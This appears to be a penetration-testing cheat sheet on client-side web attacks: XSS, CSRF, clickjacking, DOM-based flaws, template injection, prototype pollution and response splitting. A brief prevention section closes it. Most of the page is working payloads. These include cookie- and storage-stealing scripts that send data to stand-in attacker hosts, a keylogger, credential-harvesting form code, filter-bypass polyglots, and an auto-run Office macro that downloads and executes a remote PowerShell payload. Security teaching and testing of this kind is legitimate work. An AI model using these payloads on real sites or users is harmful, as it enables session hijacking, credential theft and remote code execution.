Client-side vulnerabilities occur in the user’s browser or client application, often exploiting the trust between the user and the application. These vulnerabilities can lead to session hijacking, data theft, and unauthorized actions performed on behalf of the victim.
- Cross-Site Scripting (XSS)
- Cross-Site Request Forgery (CSRF)
- Clickjacking
- DOM-Based Vulnerabilities
- Client-Side Template Injection (CSTI)
- JavaScript Prototype Pollution
- Client-Side Security Bypass
- HTTP Response Splitting
- Browser-Specific Attacks
- Prevention and Mitigation
Cross-Site Scripting (XSS)
XSS is one of the most common web vulnerabilities, allowing attackers to inject malicious scripts into web pages viewed by other users.
Types of XSS
Reflected XSS
Non-persistent XSS that occurs when malicious script is reflected off a web server immediately.
// Basic reflected XSS
<script>alert('XSS')</script>
// URL parameter injection
http://site.com/search?q=<script>alert('XSS')</script>Stored/Persistent XSS
The most dangerous type - malicious script is permanently stored on the target server.
// Stored XSS in comment field
<script>
fetch('http://attacker.site/steal?cookie=' + btoa(document.cookie));
</script>
// Alternative cookie stealing
<script>
var i = new Image();
i.src = "http://attacker.site/log.php?q=" + escape(document.cookie);
</script>DOM-Based XSS
Vulnerability exists in client-side code rather than server-side code.
// Vulnerable code
document.write("Welcome " + window.location.hash);
// Exploit URL
http://site.com#<script>alert(1)</script>
// Common dangerous sinks
document.write()
element.innerHTML
element.outerHTML
eval()
setTimeout()
setInterval()Blind XSS
Similar to stored XSS but execution happens out of band, often in admin panels.
</textarea><script>
fetch('http://attacker-ip:port?data=' + btoa(document.body.innerHTML));
</script>Advanced XSS Payloads
Session Stealing
<script>
// Modern approach using fetch
fetch('https://attacker.com/steal', {
method: 'POST',
body: JSON.stringify({
cookies: document.cookie,
localStorage: JSON.stringify(localStorage),
sessionStorage: JSON.stringify(sessionStorage)
})
});
</script>Keylogger Implementation
<script>
let keys = '';
document.onkeypress = function(e) {
keys += e.key;
if (keys.length > 10) {
fetch('https://attacker.com/log?keys=' + btoa(keys));
keys = '';
}
}
</script>Credential Harvesting
<input name=username id=username>
<input type=password name=password onchange="
if(this.value.length)fetch('https://attacker.site',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">Phishing via Form Redirection
document.forms[0].action="https://attacker.site/steal.php";XSS Filter Bypass Techniques
Basic Bypasses
// Input tag escape
"><script>alert('XSS');</script>
// Textarea escape
</textarea><script>alert('XSS');</script>
// JavaScript context escape
';alert('XSS');//
// Filter evasion (if 'script' is blocked)
<sscriptcript>alert('XSS');</sscriptcript>Advanced Bypasses
// Attribute injection
" onload="alert('XSS');"
// SVG vectors
"><svg><animatetransform onbegin=alert(1)>
// Template literals (ES6)
${alert(1)}
// AngularJS specific
{{constructor.constructor('alert(1)')()}}
// Custom tags with autofocus
<xss id=x onfocus=alert(document.cookie) tabindex=1>#xUniversal XSS Polyglot
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('XSS') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('XSS')//>\x3eCross-Site Request Forgery (CSRF)
CSRF attacks force authenticated users to perform unintended actions on a web application.
Basic CSRF Attack
<!-- Auto-submitting form -->
<form action="https://vulnerable-site.com/change-email" method="POST">
<input type="hidden" name="email" value="attacker@evil.com">
</form>
<script>
document.forms[0].submit();
</script>
<!-- Image-based CSRF for GET requests -->
<img src="https://vulnerable-site.com/delete?id=123" width="0" height="0">CSRF Bypass Techniques
Method Override
<!-- Change POST to GET -->
<form action="https://site.com/action">
<input type="hidden" name="email" value="attacker@evil.com">
</form>Token Bypass Strategies
- Remove CSRF token parameter completely
- Use token from another session
- Submit blank token value
- Change token value to same-length string
- Check if token validation depends on request method
Advanced CSRF Scenarios
JSON CSRF
<form action="https://site.com/api/action" method="POST" enctype="text/plain">
<input name='{"action":"delete","id":"123","ignore":"' value='"}'>
</form>CORS-based CSRF
fetch('https://vulnerable-site.com/api/action', {
method: 'POST',
credentials: 'include',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify({action: 'delete', id: '123'})
});Clickjacking
Clickjacking tricks users into clicking on something different from what they perceive.
Basic Clickjacking Attack
<!DOCTYPE html>
<html>
<head>
<style>
iframe {
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
opacity: 0; /* Make invisible */
z-index: 2; /* Place on top */
}
button {
position: absolute;
top: 400px;
left: 60px;
z-index: 1;
}
</style>
</head>
<body>
<iframe src="https://vulnerable-site.com/delete-account"></iframe>
<button>Click me for a prize!</button>
</body>
</html>Reverse Clickjacking
<style>
iframe {
position: absolute;
top: 0;
left: 0;
opacity: 0.9; /* Slightly visible to appear legitimate */
z-index: 1; /* Below malicious button */
}
.evil-button {
position: absolute;
top: 400px;
left: 60px;
opacity: 0; /* Invisible malicious button */
z-index: 2; /* On top */
}
</style>DOM-Based Vulnerabilities
DOM vulnerabilities occur when client-side JavaScript processes untrusted data in an unsafe way.
Common Sources and Sinks
Dangerous Sources
// URL-based sources
document.URL
document.documentURI
document.baseURI
location
location.href
location.search
location.hash
// Storage sources
document.cookie
localStorage
sessionStorage
// Other sources
document.referrer
window.name
history.pushStateDangerous Sinks
// Direct execution
eval()
setTimeout()
setInterval()
Function()
// HTML manipulation
document.write()
element.innerHTML
element.outerHTML
// Script manipulation
script.src
script.textContent
// Navigation
location
location.href
location.replace()DOM XSS Examples
// document.write sink
var name = location.hash.slice(1);
document.write("Hello " + name);
// Exploit: http://site.com#<script>alert(1)</script>
// innerHTML sink with input sanitization bypass
var input = location.search.slice(1);
document.getElementById('output').innerHTML = input;
// Exploit: ?<img src=1 onerror=alert(1)>
// jQuery vulnerability
$('a').attr('href', location.hash.slice(1));
// Exploit: #javascript:alert(1)Web Message Exploitation
<!-- Malicious iframe communication -->
<iframe src="https://vulnerable.com/" onload="
this.contentWindow.postMessage('<img src=1 onerror=alert(1)>','*')
">
</iframe>Client-Side Template Injection (CSTI)
CSTI occurs when user input is embedded into client-side templates without proper sanitization.
AngularJS Exploitation
// AngularJS sandbox bypasses
{{constructor.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)}}Vue.js Exploitation
// Vue.js template injection
{{_c.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}JavaScript Prototype Pollution
Prototype pollution allows attackers to inject properties into JavaScript object prototypes.
Basic Exploitation
// URL parameter pollution
?__proto__[isAdmin]=true
?__proto__.isAdmin=true
?constructor[prototype][isAdmin]=true
// JSON pollution
{
"__proto__": {
"isAdmin": true
}
}Real-world Impact
// If application checks for admin like this:
if (user.isAdmin) {
// Grant admin access
}
// Pollution makes ALL objects have isAdmin=true
Object.prototype.isAdmin = true;Client-Side Security Bypass
JavaScript Validation Bypass
Method 1: Disable JavaScript
1. Browser settings → Disable JavaScript
2. Submit form with invalid dataMethod 2: Proxy Interception
1. Intercept response in Burp Suite
2. Find validation JavaScript
3. Comment out or modify validation code
4. Forward modified responseMethod 3: Direct API Access
# Bypass UI validation
curl -X POST \
-F "submit=true" \
-F "file=@malicious.php" \
https://site.com/uploadFile Upload Bypass
// Client-side check bypass
// Original: if (file.type !== 'image/jpeg')
// Bypass: Rename malicious.php to malicious.jpg
// Then intercept and change back to .phpHTTP Response Splitting
Response splitting allows injection of HTTP headers through CRLF injection.
Basic Attack
# Inject headers
vulnerable.com/page?redirect=test%0d%0aX-Injected-Header:%20true
# Full response splitting
page?lang=en%0d%0a%0d%0a<script>alert(1)</script>Advanced Exploitation
# Set malicious cookies
test%0d%0aSet-Cookie:%20admin=true
# CORS bypass
test%0d%0aAccess-Control-Allow-Origin:%20http://attacker.siteBrowser-Specific Attacks
WebDAV Exploitation (Windows)
<!-- Windows Library file (.Library-ms) -->
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>Documents</name>
<ownerSID>S-1-5-21-1234</ownerSID>
<version>1</version>
<isLibraryPinned>true</isLibraryPinned>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>\\attacker-server\share</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>Office Macro Attacks
' Auto-executing VBA macro
Sub AutoOpen()
Shell "powershell -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')"
End Sub
Sub Document_Open()
AutoOpen
End SubPrevention and Mitigation
XSS Prevention
- Input Validation: Whitelist allowed characters
- Output Encoding: Context-aware encoding (HTML, JavaScript, CSS, URL)
- Content Security Policy (CSP): Restrict script sources
- Security Headers: X-XSS-Protection, X-Content-Type-Options
CSRF Prevention
- Anti-CSRF Tokens: Unique per-session tokens
- SameSite Cookies: Prevent cross-origin requests
- Double Submit Cookies: Token in both cookie and request
- Custom Headers: Require custom header for state-changing operations
Clickjacking Prevention
- X-Frame-Options: DENY or SAMEORIGIN
- CSP frame-ancestors: More flexible than X-Frame-Options
- Frame-busting JavaScript: Legacy defense
DOM Security
- Avoid dangerous functions: eval(), innerHTML, document.write()
- Input validation: Sanitize all user inputs
- Use safe alternatives: textContent instead of innerHTML
- Content Security Policy: Restrict unsafe-inline
Testing Tools
- Burp Suite: Comprehensive web application testing
- XSStrike: Advanced XSS detection and exploitation
- BeEF: Browser Exploitation Framework
- DOM Invader: Burp Suite Pro extension for DOM testing
- XSSHunter: Blind XSS detection platform
- CSRF PoC Generator: Burp Suite Pro feature
- Commix: Command injection exploitation tool
Related Topics
- Web-Application-Security - Comprehensive web security coverage
- Server-Side-Vulnerabilities - Backend security vulnerabilities
- Network-Security-and-Services - Network-level security
- Tools-and-Methodologies - Security testing tools
- Reconnaissance-and-Information-Gathering - Initial assessment techniques
Cross-References
- XSS Prevention: See Security Headers for CSP implementation
- CSRF Tokens: Learn about Authentication Security
- Input Validation: Check Server-Side Input Validation
- Security Testing: Use Web Application Tools